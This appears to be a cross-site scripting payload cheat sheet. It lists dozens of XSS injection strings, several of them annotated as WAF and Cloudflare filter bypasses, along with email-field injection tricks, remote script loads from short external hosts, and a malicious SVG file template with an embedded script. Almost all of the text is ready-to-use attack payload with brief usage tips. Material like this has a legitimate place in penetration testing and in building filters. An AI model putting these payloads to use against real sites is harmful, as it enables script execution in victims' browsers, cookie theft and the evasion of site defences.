Please do visit as well: https://github.com/s0md3v/AwesomeXSS

<img src=1 onerror=alert("XSS")>
<img/src/onerror=prompt(document.domain)>
<script src="data:text/javascript,alert(1)"></script>
"><img src=1 onerror=alert("XSS")>
"><img src=x onerror=alert(document.cookie)>
<img src=x onerror=alert(document.cookie)>
`<img/src/onerror=prompt(document.domain)>`
<iframe srcdoc="<img src=x onerror=alert(999)>"></iframe>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
<img src="x:gif" onerror="window['al\u0065rt'](0)"></img>
"`'><script>\x3Bjavascript:alert(1)</script>
</TITLE><SCRIPT>alert(document.domain);</SCRIPT> 
<<SCRIPT>alert("XSS");//\<</SCRIPT>
`[{\"displayName\":\"<img src=x onmouseover=prompt(document.domain)>\"}]`
</title><scRipt>alert(0x00C57D)</scRipt>
<iMg src%3dN onerror%3dalert(0x0036A9)>
<iMg src%3dN onerror%3dalert(0x000D98)>
<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>     --> Do Try this if there is HTML Injection
<a href="javascript:alert(document.domain)">XSS</a>                                --> Do Try this if there is HTML Injection
<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">XSS</a>             --> Do try this one for stored XSS
<details/open=/Open/href=/data=+ontoggle="(alert)(document.domain)
<details/open=/Open/href=/data=;+ontoggle="(alert)(document.domain)                --> Helps bypass
<svg%20onx=()%20onload=(confirm)(document.domain)>                                 --> WAF Bypass
["');alert('XSS');//"]@gmail.com                                                   --> Login Email (WAF Bypass)
test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E                              --> Best Email XSX
test@gmail.com%2527%5C%2522%253E%253Csvg%2Fonload%3Dalert%28%2Fxss%2F%29%253E      --> Double Encoding the uppper payload
"><Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="))>        --> Cloudflare xss bypass 
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>              --> Cloudflare xss bypass 
https://xxx.com/path/"><script>alert(1)</script>                                   --> Sometime do add additional parameters like path in this sense and then payload forreflected XSS
abc`;return false});});alert`xss`;</script>                                        --> For reflected XSS
abc%60%3Breturn%20false%7D)%3B%7D)%3Balert%60xss%60%3B%3C%2Fscript%3E              --> For reflected XSS
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ==")>               --> Do URL encode Cloudflare bypass
<A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z
<d3"<"/onclick="1>[confirm``]"<">z
<d3/onmouseenter=[2].find(confirm)>z
<details open ontoggle=confirm()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
<a href="javascript%26colon;alert(1)">click
<a href=javas&#99;ript:alert(1)>click
<script/"<a"/src=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()//
<--`<img/src=` onerror=confirm``> --!>
<svg%0Aonload=%09((pro\u006dpt))()//
<sCript x>(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1)) "">
<!--><script src=//14.rs>
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src \/\/onload = prompt(1)
<x oncut=alert()>x
<svg onload=write()>

###SVG###
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.domain);
  </script>
</svg>

--> Now save the above script as file.svg
